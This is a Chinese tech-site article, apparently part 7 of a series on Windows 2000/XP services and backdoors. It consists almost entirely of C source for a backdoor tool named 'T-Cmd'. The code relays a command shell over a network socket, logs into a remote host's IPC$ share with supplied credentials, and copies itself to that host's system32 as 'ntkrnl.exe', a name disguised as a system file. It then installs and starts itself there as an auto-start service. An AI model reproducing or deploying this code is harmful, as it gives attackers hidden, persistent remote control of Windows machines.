科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网软件频道Win2000/XP服务与后门技术(7)

Win2000/XP服务与后门技术(7)

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

Windows下的服务程序都遵循服务控制管理器(SCM)的接口标准,它们会在登录系统时自动运行,甚至在没有用户登录系统的情况下也会正常执行,类似与Unix系统中的守护进程(daemon)。

作者:TOo2y 来源:中华安全网 2008年1月5日

关键字: 后门技术 服务 Windows Windows xp

  • 评论
  • 分享微博
  • 分享邮件

DWord WINAPI ReadShell(LPVOID lpParam)
{
SESSIONDATA sdRead=*(PSESSIONDATA)lpParam;
DWORD    dwBufferRead,dwBufferNow,dwBuffer2Send;
char     szBuffer[BUFFER_SIZE];
char     szBuffer2Send[BUFFER_SIZE+32];
char     PrevChar;
char     szStartMessage[256]="\r\n\r\n\t\t---[ T-Cmd v1.0 beta, by TOo2y ]---\r\n\t\t---[ E-mail: TOo2y@safechina.net ]---\r\n\t\t---[ HomePage: www.safechina.net ]---\r\n\t\t---[ Date: 02-05-2003      ]---\r\n\n";
    char     szHelpMessage[256]="\r\nEscape Character is 'CTRL+]'\r\n\n";

     send(sdRead.sClIEnt,szStartMessage,256,0);
send(sdRead.sClient,szHelpMessage,256,0);

while(PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL))
{    
if(dwBufferRead>0)
{
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
}
else
{
Sleep(10);
continue;
}

for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++,dwBuffer2Send++)
{
if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r'))
{
szBuffer[dwBuffer2Send++]='\r';
}
PrevChar=szBuffer[dwBufferNow];
szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow];
}

if(send(sdRead.sClient,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR)
{
OutputDebugString("Send in ReadShell Error !\n");
break;
}
Sleep(5);
}

shutdown(sdRead.sClient,0x02);  
closesocket(sdRead.sClient);
return 0;
}

DWORD WINAPI WriteShell(LPVOID lpParam)
{
SESSIONDATA sdWrite=*(PSESSIONDATA)lpParam;
DWORD    dwBuffer2Write,dwBufferWritten;
char     szBuffer[1];
char     szBuffer2Write[BUFFER_SIZE];

dwBuffer2Write=0;  
while(recv(sdWrite.sClient,szBuffer,1,0)!=0)
{
szBuffer2Write[dwBuffer2Write++]=szBuffer[0];

if(strnicmp(szBuffer2Write,"exit\r\n",6)==0)
{
shutdown(sdWrite.sClient,0x02);    
closesocket(sdWrite.sClient);
return 0;
}

if(szBuffer[0]=='\n')
{
if(WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL)==0)
{
OutputDebugString("WriteFile in WriteShell(Recv) Error !\n");
break;
}
dwBuffer2Write=0;
}
Sleep(10);
}

shutdown(sdWrite.sClient,0x02);
closesocket(sdWrite.sClient);
return 0;
}

BOOL ConnectRemote(BOOL bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char     lpIPC[256];
DWORD     dwErrorCode;
NETRESOURCE NetResource;

sprintf(lpIPC,"\\\\%s\\ipc$",lpHost);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType   = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;

if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}

if(bConnect)
{
     printf("Now Connecting ...... ");
while(1)
{
     dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
       if((dwErrorCode==ERROR_ALREADY_ASSIGNED) ││ (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
{
   WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
     else if(dwErrorCode==NO_ERROR)
{
   printf("Success !\n");
      break;
}
    else
{
printf("Failure !\n");  
       return FALSE;
}
     Sleep(10);
}
}
else
{
   printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
}
else
{
printf("Failure !\n");
return FALSE;
}
}

return TRUE;
}

void InstallCmdService(char *lpHost)
{
SC_HANDLE    schSCManager;
SC_HANDLE    schService;
char       lpCurrentPath[MAX_PATH];
char       lpImagePath[MAX_PATH];
char       *lpHostName;
     WIN32_FIND_DATA FileData;
HANDLE     hSearch;
DWORD      dwErrorCode;
SERVICE_STATUS InstallServiceStatus;

if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\ntkrnl.exe");
       lpHostName=NULL;
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\ntkrnl.exe",lpHost);
lpHostName=(char *)malloc(256);
sprintf(lpHostName,"\\\\%s",lpHost);
}

printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
      return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}

schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
     if(schSCManager==NULL)
{
printf("Open Service Control Manager Database Failure !\n");
return ;
}

printf("Creating Service .... ");
schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
         SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
  SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
   printf("Failure !\n");
CloseServiceHandle(schSCManager);
   return ;
}
else
{
printf("already Exists !\n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf("Success !\n");
}

printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
       CloseServiceHandle(schSCManager);
         CloseServiceHandle(schService);
         return ;
}
}
else
{
printf("Pending ... ");
}

while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
{
printf("Failure !\n");
}
else
{
printf("Success !\n");
}

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章